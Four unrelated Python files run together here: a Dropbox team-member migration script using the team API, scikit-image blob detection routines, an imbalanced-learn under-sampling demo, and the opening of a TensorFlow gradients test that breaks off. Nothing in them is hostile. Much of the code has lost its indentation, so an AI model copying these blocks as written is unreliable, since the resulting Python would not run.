By default adding users to target team will send them an invite email, edit variable 'gSendWelcomeEmail' to stop this.
Script logs most console content to a file 'logfile.txt' in the location script is executed.
** WARNING **
If you enter an incorrect Target Team Token, users' accounts could be orphaned, as they'll be removed from the Source Team but not added to
the Target Team.
Requirements:
Script tested on Python 3.6.5
One Dropbox API Token is needed from each team, source team and target team. Inserted just below this comments section.
Permissions needed on token:
Source Team:
- team_data.member "View structure of your team's and members' folders"
- members.delete "Remove and recover your team members' accounts"
Target Team:
- team_data.member "View structure of your team's and members' folders"
- members.write "View and manage your team membership"
Pre-requisites:
* Scripts requires library 'Requests' - You can install using "pip install requests"
********************************************************************************************************************
"""
gFromTeamTOKEN = '' # Scoped API token for SOURCE team to remove user from
gToTeamTOKEN = '' # Scoped API token for TARGET team to add user to
gMockRun = True # If True the script emulates the actual call to the API so no account moves done
gSendWelcomeEmail = False # If True the script will send a Welcome / invite to user added to target team.
gRetainTeamShares = False # If True, when users removed from source team they will retain access to Dropbox Folders ( not paper folders ) already
# explicitly shared with them (not via group membership)
"""
********************************************************************************************************************
DO NOT EDIT BELOW THIS POINT
********************************************************************************************************************
"""
# Track how long script takes to run
totalTimeStart = datetime.datetime.fromtimestamp(time.time())
# Global Variables
gUsers = []
#############################################
# Function to return a string representation of time taken
#############################################
def getTimeInHoursMinutesSeconds( sec ):
sec = int(sec)
    hrs = sec // 3600
sec -= 3600*hrs
    mins = sec // 60
sec -= 60*mins
return '%s hrs, %s mins, %s sec' % ( hrs, mins, sec);
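# For example, getTimeInHoursMinutesSeconds(3725) returns '1 hrs, 2 mins, 5 sec'.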
#############################################
# Function to print Message to console in a tidy box
#############################################
def printmessageblock( str ):
print ("\n*********************************************************")
print ("* %s" % (str))
print ("*********************************************************\n")
return;
#############################################
# Step 0
# Clear the terminal window, not essential but makes it easier to read this way.
#############################################
os.system('cls' if os.name=='nt' else 'clear')
#############################################
# Step 1
# Check that there's a From and To Token provided.
#############################################
if (len( gFromTeamTOKEN ) <= 0 or len( gToTeamTOKEN ) <=0 ):
printmessageblock ( "It would appear you're missing one of the necessary API Tokens. Ending script." )
exit()
#############################################
# Step 2
# Check if the user wants to proceed. This could be destructive, removing users from the source team.
#############################################
printmessageblock('Are you sure you wish to proceed with running this script? ')
if (not gMockRun):
print( "If you proceed, team members listed in CSV file and found in the corresponding source API team will be removed from that team.")
print( "Script will attempt then to add them to target team")
else:
print( "You are in MOCK RUN mode so no accounts will be removed or added.")
lsAnswer = input("\nType 'y' to proceed or 'n' to cancel this script: ")
if ( lsAnswer == 'y' or lsAnswer == 'Y'):
print( "\nExecuting script" )
elif ( lsAnswer == 'n' or lsAnswer == 'N'):
print( '\nExiting script\n')
exit()
else:
print("\n\nUser did not enter a 'n' or a 'y' input. Ending script.")
exit();
#############################################
# Step 3
# Note the standard output to console
# Redirect standard output to File until end of script.
#############################################
print ( "Starting script, further outputs to log file." )
# Note the standard output
gstdout = sys.stdout
# Redirect standard output to log file
sys.stdout = open('logfile.txt', 'w')
#############################################
# Step 4
# Get the list of users to remove from source team
# and add to target team
#############################################
# Open a file to read from
with open( 'users.csv', 'r') as csvfileRead:
    # Read all rows (email, first name, last name) into a list
reader = csv.reader(csvfileRead)
gUsers = list(reader)
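# Each row of users.csv is expected to look like (hypothetical data):
#   jane.doe@example.com,Jane,Doe
#   john.smith@example.com,John,Smith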
#############################################
# Step 5
# Iterate through each user,
# uninvite from Source Team
#############################################
# Details for source team
aHeadersSource = {'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % gFromTeamTOKEN}
aURLSource = 'https://api.dropboxapi.com/2/team/members/remove'
# Details for target team
aHeadersTarget = {'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % gToTeamTOKEN}
aURLTarget = 'https://api.dropboxapi.com/2/team/members/add_v2'
for user in gUsers:
aEmailAddress = user[0]
aFirstName = user[1]
aSurname = user[2]
# Set Users Email into parameters
aData = json.dumps({'user': {'.tag': 'email', 'email': aEmailAddress}, 'wipe_data': False, 'keep_account': True, 'retain_team_shares': gRetainTeamShares})
print( "\n------------------------------------------------------------------------" )
print( "Attempting to remove %s from source team." % aEmailAddress)
""" Make the API call """
if ( not gMockRun ):
aResult = requests.post(aURLSource, headers=aHeadersSource, data=aData)
        # If we don't get a 200 HTTP response code, we didn't get a result.
if( aResult.status_code != 200 ):
print ('-- Failed to remove %s from team. %s' % (aEmailAddress, aResult.text))
continue;
else:
print ('++ Successfully removed %s from team. ' % (aEmailAddress))
else:
print ('++ MOCK RUN: Successfully removed %s from team.' % (aEmailAddress))
##########################################
# Now try invite them to the target team!
##########################################
# Set Users Email into parameters
aData = json.dumps({"new_members": [{
"member_email": aEmailAddress,
"member_given_name": aFirstName,
"member_surname": aSurname,
"send_welcome_email": gSendWelcomeEmail
}],
"force_async": False
})
print( "\nAttempting to add %s to target team." % aEmailAddress)
if ( not gMockRun ):
""" Make the API call """
aResult = requests.post(aURLTarget, headers=aHeadersTarget, data=aData)
        # If we don't get a 200 HTTP response code, we didn't get a result.
if( aResult.status_code != 200 ):
print ('-- Failed to add %s to target team. %s' % (aEmailAddress, aResult.text))
continue;
else:
print ('++ Successfully added %s to target team.' % (aEmailAddress))
else:
print ('++ MOCK RUN: Successfully added %s to target team.' % (aEmailAddress))
#############################################
# Final step
# 1. Output how long the script took to run.
#############################################
totalTimeStop = datetime.datetime.fromtimestamp(time.time())
totalTimeInSeconds = (totalTimeStop-totalTimeStart).total_seconds()
timeAsStr = getTimeInHoursMinutesSeconds( totalTimeInSeconds )
printmessageblock( " Script finished running, it took %s." % ( timeAsStr ) )
# Put standard output back to console
sys.stdout = gstdout
print( "Script finished")
|
|
import numpy as np
from scipy.ndimage import gaussian_filter, gaussian_laplace
import itertools as itt
import math
from math import sqrt, hypot, log
from numpy import arccos
from ..util import img_as_float
from .peak import peak_local_max
from ._hessian_det_appx import _hessian_matrix_det
from ..transform import integral_image
from .._shared.utils import assert_nD
# This basic blob detection algorithm is based on:
# http://www.cs.utah.edu/~jfishbau/advimproc/project1/ (04.04.2013)
# Theory behind: http://en.wikipedia.org/wiki/Blob_detection (04.04.2013)
def _blob_overlap(blob1, blob2):
"""Finds the overlapping area fraction between two blobs.
Returns a float representing fraction of overlapped area.
Parameters
----------
blob1 : sequence
A sequence of ``(y,x,sigma)``, where ``x,y`` are coordinates of blob
and sigma is the standard deviation of the Gaussian kernel which
detected the blob.
blob2 : sequence
A sequence of ``(y,x,sigma)``, where ``x,y`` are coordinates of blob
and sigma is the standard deviation of the Gaussian kernel which
detected the blob.
Returns
-------
f : float
Fraction of overlapped area.
"""
root2 = sqrt(2)
# extent of the blob is given by sqrt(2)*scale
r1 = blob1[2] * root2
r2 = blob2[2] * root2
d = hypot(blob1[0] - blob2[0], blob1[1] - blob2[1])
if d > r1 + r2:
return 0
# one blob is inside the other, the smaller blob must die
if d <= abs(r1 - r2):
return 1
ratio1 = (d ** 2 + r1 ** 2 - r2 ** 2) / (2 * d * r1)
ratio1 = np.clip(ratio1, -1, 1)
acos1 = arccos(ratio1)
ratio2 = (d ** 2 + r2 ** 2 - r1 ** 2) / (2 * d * r2)
ratio2 = np.clip(ratio2, -1, 1)
acos2 = arccos(ratio2)
a = -d + r2 + r1
b = d - r2 + r1
c = d + r2 - r1
d = d + r2 + r1
area = r1 ** 2 * acos1 + r2 ** 2 * acos2 - 0.5 * sqrt(abs(a * b * c * d))
return area / (math.pi * (min(r1, r2) ** 2))
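# For instance (illustrative values only): two coincident blobs of equal sigma
# give an overlap of 1, blobs whose circles are separated by more than the sum
# of their radii give 0, and intermediate separations fall back to the
# circle-intersection area computed above.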
def _prune_blobs(blobs_array, overlap):
"""Eliminated blobs with area overlap.
Parameters
----------
blobs_array : ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
overlap : float
A value between 0 and 1. If the fraction of area overlapping for 2
blobs is greater than `overlap` the smaller blob is eliminated.
Returns
-------
A : ndarray
`array` with overlapping blobs removed.
"""
# iterating again might eliminate more blobs, but one iteration suffices
# for most cases
for blob1, blob2 in itt.combinations(blobs_array, 2):
if _blob_overlap(blob1, blob2) > overlap:
if blob1[2] > blob2[2]:
blob2[2] = -1
else:
blob1[2] = -1
# return blobs_array[blobs_array[:, 2] > 0]
return np.array([b for b in blobs_array if b[2] > 0])
def blob_dog(image, min_sigma=1, max_sigma=50, sigma_ratio=1.6, threshold=2.0,
overlap=.5,):
"""Finds blobs in the given grayscale image.
Blobs are found using the Difference of Gaussian (DoG) method [1]_.
For each blob found, the method returns its coordinates and the standard
deviation of the Gaussian kernel that detected the blob.
Parameters
----------
image : ndarray
Input grayscale image, blobs are assumed to be light on dark
background (white on black).
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel. Keep this low to
detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel. Keep this high to
detect larger blobs.
sigma_ratio : float, optional
The ratio between the standard deviation of Gaussian Kernels used for
computing the Difference of Gaussians
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
        than threshold are ignored. Reduce this to detect blobs with lower
        intensities.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
        fraction greater than `overlap`, the smaller blob is eliminated.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_difference_of_Gaussians_approach
Examples
--------
>>> from skimage import data, feature
>>> feature.blob_dog(data.coins(), threshold=.5, max_sigma=40)
array([[ 45. , 336. , 16.777216],
[ 52. , 155. , 16.777216],
[ 52. , 216. , 16.777216],
[ 54. , 42. , 16.777216],
[ 54. , 276. , 10.48576 ],
[ 58. , 100. , 10.48576 ],
[ 120. , 272. , 16.777216],
[ 124. , 337. , 10.48576 ],
[ 125. , 45. , 16.777216],
[ 125. , 208. , 10.48576 ],
[ 127. , 102. , 10.48576 ],
[ 128. , 154. , 10.48576 ],
[ 185. , 347. , 16.777216],
[ 193. , 213. , 16.777216],
[ 194. , 277. , 16.777216],
[ 195. , 102. , 16.777216],
[ 196. , 43. , 10.48576 ],
[ 198. , 155. , 10.48576 ],
[ 260. , 46. , 16.777216],
[ 261. , 173. , 16.777216],
[ 263. , 245. , 16.777216],
[ 263. , 302. , 16.777216],
[ 267. , 115. , 10.48576 ],
[ 267. , 359. , 16.777216]])
Notes
-----
    The radius of each blob is approximately :math:`\sqrt{2}\sigma`.
"""
assert_nD(image, 2)
image = img_as_float(image)
# k such that min_sigma*(sigma_ratio**k) > max_sigma
k = int(log(float(max_sigma) / min_sigma, sigma_ratio)) + 1
# a geometric progression of standard deviations for gaussian kernels
sigma_list = np.array([min_sigma * (sigma_ratio ** i)
for i in range(k + 1)])
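    # Illustration with the defaults (min_sigma=1, sigma_ratio=1.6): the
    # progression runs 1, 1.6, 2.56, 4.096, ..., which is why sigmas such as
    # 10.48576 (1.6**5) and 16.777216 (1.6**6) appear in the example output above.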
gaussian_images = [gaussian_filter(image, s) for s in sigma_list]
# computing difference between two successive Gaussian blurred images
# multiplying with standard deviation provides scale invariance
dog_images = [(gaussian_images[i] - gaussian_images[i + 1])
* sigma_list[i] for i in range(k)]
image_cube = np.dstack(dog_images)
# local_maxima = get_local_maxima(image_cube, threshold)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
def blob_log(image, min_sigma=1, max_sigma=50, num_sigma=10, threshold=.2,
overlap=.5, log_scale=False):
"""Finds blobs in the given grayscale image.
Blobs are found using the Laplacian of Gaussian (LoG) method [1]_.
For each blob found, the method returns its coordinates and the standard
deviation of the Gaussian kernel that detected the blob.
Parameters
----------
image : ndarray
Input grayscale image, blobs are assumed to be light on dark
background (white on black).
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel. Keep this low to
detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel. Keep this high to
detect larger blobs.
num_sigma : int, optional
The number of intermediate values of standard deviations to consider
between `min_sigma` and `max_sigma`.
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
        than threshold are ignored. Reduce this to detect blobs with lower
        intensities.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
        fraction greater than `overlap`, the smaller blob is eliminated.
log_scale : bool, optional
If set intermediate values of standard deviations are interpolated
using a logarithmic scale to the base `10`. If not, linear
interpolation is used.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_Laplacian_of_Gaussian
Examples
--------
>>> from skimage import data, feature, exposure
>>> img = data.coins()
>>> img = exposure.equalize_hist(img) # improves detection
>>> feature.blob_log(img, threshold = .3)
array([[ 113. , 323. , 1. ],
[ 121. , 272. , 17.33333333],
[ 124. , 336. , 11.88888889],
[ 126. , 46. , 11.88888889],
[ 126. , 208. , 11.88888889],
[ 127. , 102. , 11.88888889],
[ 128. , 154. , 11.88888889],
[ 185. , 344. , 17.33333333],
[ 194. , 213. , 17.33333333],
[ 194. , 276. , 17.33333333],
[ 197. , 44. , 11.88888889],
[ 198. , 103. , 11.88888889],
[ 198. , 155. , 11.88888889],
[ 260. , 174. , 17.33333333],
[ 263. , 244. , 17.33333333],
[ 263. , 302. , 17.33333333],
[ 266. , 115. , 11.88888889]])
Notes
-----
    The radius of each blob is approximately :math:`\sqrt{2}\sigma`.
"""
assert_nD(image, 2)
image = img_as_float(image)
if log_scale:
start, stop = log(min_sigma, 10), log(max_sigma, 10)
sigma_list = np.logspace(start, stop, num_sigma)
else:
sigma_list = np.linspace(min_sigma, max_sigma, num_sigma)
# computing gaussian laplace
# s**2 provides scale invariance
gl_images = [-gaussian_laplace(image, s) * s ** 2 for s in sigma_list]
image_cube = np.dstack(gl_images)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
def blob_doh(image, min_sigma=1, max_sigma=30, num_sigma=10, threshold=0.01,
overlap=.5, log_scale=False):
"""Finds blobs in the given grayscale image.
Blobs are found using the Determinant of Hessian method [1]_. For each blob
found, the method returns its coordinates and the standard deviation
of the Gaussian Kernel used for the Hessian matrix whose determinant
detected the blob. Determinant of Hessians is approximated using [2]_.
Parameters
----------
image : ndarray
        Input grayscale image. Blobs can either be light on dark or vice versa.
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel used to compute
Hessian matrix. Keep this low to detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel used to compute
Hessian matrix. Keep this high to detect larger blobs.
num_sigma : int, optional
The number of intermediate values of standard deviations to consider
between `min_sigma` and `max_sigma`.
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
        than threshold are ignored. Reduce this to detect less prominent blobs.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
        fraction greater than `overlap`, the smaller blob is eliminated.
log_scale : bool, optional
If set intermediate values of standard deviations are interpolated
using a logarithmic scale to the base `10`. If not, linear
interpolation is used.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel of the Hessian Matrix whose
determinant detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_determinant_of_the_Hessian
.. [2] Herbert Bay, Andreas Ess, Tinne Tuytelaars, Luc Van Gool,
"SURF: Speeded Up Robust Features"
ftp://ftp.vision.ee.ethz.ch/publications/articles/eth_biwi_00517.pdf
Examples
--------
>>> from skimage import data, feature
>>> img = data.coins()
>>> feature.blob_doh(img)
array([[ 121. , 271. , 30. ],
[ 123. , 44. , 23.55555556],
[ 123. , 205. , 20.33333333],
[ 124. , 336. , 20.33333333],
[ 126. , 101. , 20.33333333],
[ 126. , 153. , 20.33333333],
[ 156. , 302. , 30. ],
[ 185. , 348. , 30. ],
[ 192. , 212. , 23.55555556],
[ 193. , 275. , 23.55555556],
[ 195. , 100. , 23.55555556],
[ 197. , 44. , 20.33333333],
[ 197. , 153. , 20.33333333],
[ 260. , 173. , 30. ],
[ 262. , 243. , 23.55555556],
[ 265. , 113. , 23.55555556],
[ 270. , 363. , 30. ]])
Notes
-----
The radius of each blob is approximately `sigma`.
Computation of Determinant of Hessians is independent of the standard
deviation. Therefore detecting larger blobs won't take more time. In
    methods like :py:meth:`blob_dog` and :py:meth:`blob_log`, the computation
of Gaussians for larger `sigma` takes more time. The downside is that
this method can't be used for detecting blobs of radius less than `3px`
due to the box filters used in the approximation of Hessian Determinant.
"""
assert_nD(image, 2)
image = img_as_float(image)
image = integral_image(image)
if log_scale:
start, stop = log(min_sigma, 10), log(max_sigma, 10)
sigma_list = np.logspace(start, stop, num_sigma)
else:
sigma_list = np.linspace(min_sigma, max_sigma, num_sigma)
hessian_images = [_hessian_matrix_det(image, s) for s in sigma_list]
image_cube = np.dstack(hessian_images)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
|
|
"""
=====================================================
Comparison of the different under-sampling algorithms
=====================================================
The following example aims to make a qualitative comparison between the
different under-sampling algorithms available in the imbalanced-learn package.
"""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: MIT
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_classification
from sklearn.svm import LinearSVC
from sklearn.linear_model import LogisticRegression
from imblearn.pipeline import make_pipeline
from imblearn.under_sampling import (ClusterCentroids, RandomUnderSampler,
NearMiss,
InstanceHardnessThreshold,
CondensedNearestNeighbour,
EditedNearestNeighbours,
RepeatedEditedNearestNeighbours,
AllKNN,
NeighbourhoodCleaningRule,
OneSidedSelection)
print(__doc__)
###############################################################################
# The following function will be used to create a toy dataset. It uses
# ``make_classification`` from scikit-learn but fixes some parameters.
def create_dataset(n_samples=1000, weights=(0.01, 0.01, 0.98), n_classes=3,
class_sep=0.8, n_clusters=1):
return make_classification(n_samples=n_samples, n_features=2,
n_informative=2, n_redundant=0, n_repeated=0,
n_classes=n_classes,
n_clusters_per_class=n_clusters,
weights=list(weights),
class_sep=class_sep, random_state=0)
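###############################################################################
# As a quick sanity check (illustrative only; the exact counts depend on the
# rounding done inside ``make_classification``), we can inspect the class
# distribution produced by the helper above.
X_check, y_check = create_dataset(n_samples=1000, weights=(0.05, 0.15, 0.8))
print('Class distribution: {}'.format(Counter(y_check)))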
###############################################################################
# The following function will be used to plot the sample space after resampling
# to illustrate the characteristic of an algorithm.
def plot_resampling(X, y, sampling, ax):
X_res, y_res = sampling.fit_sample(X, y)
ax.scatter(X_res[:, 0], X_res[:, 1], c=y_res, alpha=0.8, edgecolor='k')
# make nice plotting
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.spines['left'].set_position(('outward', 10))
ax.spines['bottom'].set_position(('outward', 10))
return Counter(y_res)
###############################################################################
# The following function will be used to plot the decision function of a
# classifier given some data.
def plot_decision_function(X, y, clf, ax):
plot_step = 0.02
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
np.arange(y_min, y_max, plot_step))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
ax.contourf(xx, yy, Z, alpha=0.4)
ax.scatter(X[:, 0], X[:, 1], alpha=0.8, c=y, edgecolor='k')
###############################################################################
# Prototype generation: under-sampling by generating new samples
###############################################################################
###############################################################################
# ``ClusterCentroids`` under-samples by replacing the original samples with the
# centroids of the clusters found.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = ClusterCentroids(random_state=0)
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# Prototype selection: under-sampling by selecting existing samples
###############################################################################
###############################################################################
# The algorithm performing prototype selection can be subdivided into two
# groups: (i) the controlled under-sampling methods and (ii) the cleaning
# under-sampling methods.
###############################################################################
# With the controlled under-sampling methods, the number of samples to be
# selected can be specified. ``RandomUnderSampler`` is the most naive way of
# performing such selection by randomly selecting a given number of samples from
# the targeted class.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = RandomUnderSampler(random_state=0)
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``NearMiss`` algorithms implement some heuristic rules in order to select
# samples. NearMiss-1 selects samples from the majority class for which the
# average distance to the :math:`k` nearest samples of the minority class is
# the smallest. NearMiss-2 selects the samples from the majority class for
# which the average distance to the farthest samples of the minority class is
# the smallest. NearMiss-3 is a 2-step algorithm: first, for each minority
# sample, its :math:`m` nearest neighbors are kept; then, the majority
# samples selected are the ones for which the average distance to the
# :math:`k` nearest neighbors is the largest.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=5000, weights=(0.1, 0.2, 0.7), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (NearMiss(version=1, random_state=0),
NearMiss(version=2, random_state=0),
NearMiss(version=3, random_state=0))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}-{}'.format(
sampler.__class__.__name__, sampler.version))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}-{}'.format(
sampler.__class__.__name__, sampler.version))
fig.tight_layout()
###############################################################################
# ``EditedNearestNeighbours`` removes samples of the majority class whose class
# differs from that of their nearest neighbors. This sieve can be applied
# repeatedly, which is the principle of ``RepeatedEditedNearestNeighbours``.
# ``AllKNN`` differs slightly from ``RepeatedEditedNearestNeighbours`` by
# increasing the :math:`k` parameter of the internal nearest-neighbors
# algorithm at each iteration.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=500, weights=(0.2, 0.3, 0.5), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (
EditedNearestNeighbours(random_state=0),
RepeatedEditedNearestNeighbours(random_state=0),
AllKNN(random_state=0, allow_minority=True))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}'.format(
sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}'.format(
sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``CondensedNearestNeighbour`` makes use of a 1-NN to iteratively decide if a
# sample should be kept in a dataset or not. The issue is that
# ``CondensedNearestNeighbour`` is sensitive to noise and tends to preserve
# noisy samples. ``OneSidedSelection`` also uses a 1-NN but applies
# ``TomekLinks`` to remove the samples considered noisy.
# ``NeighbourhoodCleaningRule`` uses ``EditedNearestNeighbours`` to remove some
# samples. Additionally, it uses a 3 nearest-neighbors rule to remove samples
# which do not agree with this rule.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=500, weights=(0.2, 0.3, 0.5), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (
CondensedNearestNeighbour(random_state=0),
OneSidedSelection(random_state=0),
NeighbourhoodCleaningRule(random_state=0))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}'.format(
sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}'.format(
sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``InstanceHardnessThreshold`` uses the predictions of a classifier to exclude
# samples: all samples which are classified with a low probability will be
# removed.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = InstanceHardnessThreshold(random_state=0,
estimator=LogisticRegression())
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
plt.show()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import warnings
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.constant_op import constant
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import data_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import data_flow_ops # pylint: disable=unused-import
from tensorflow.python.ops import functional_ops # pylint: disable=unused-import
from tensorflow.python.ops import gradients
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.nn_ops import bias_add
from tensorflow.python.platform import googletest
def _OpsBetween(to_ops, from_ops):
"""Build the list of operations between two lists of Operations.
Args:
to_ops: list of Operations.
from_ops: list of Operations.
Returns:
The list of operations between "from_ops" and "to_ops", sorted by
decreasing operation id. This list contains all elements of to_ops.
TODO(touts): Think about returning an empty list if from_ops are not
reachable from to_ops. Presently it returns to_ops in that case.
"""
  # Ops that are reachable from the outputs of "from_ops".
reached_ops = set()
  # We only care to reach up to "to_ops" so we mark the
# output ops as reached to avoid recursing past them.
for op in to_ops:
reached_ops.add(op)
gradients_impl._MarkReachedOps(from_ops, reached_ops)
between_ops = gradients_impl._GatherInputs(to_ops, reached_ops)
between_ops.sort(key=lambda x: -x._id)
return between_ops
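# For instance, with the small graph built in testOpsBetweenSimple below,
# _OpsBetween([t3.op], [t1.op, t2.op]) returns [t3.op, t2.op, t1.op], i.e. the
# ops between the two frontiers sorted by decreasing operation id.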
class GradientsTest(test_util.TensorFlowTestCase):
def _OpNames(self, op_list):
return ["%s/%d" % (str(op.name), op._id) for op in op_list]
def _assertOpListEqual(self, ops1, ops2):
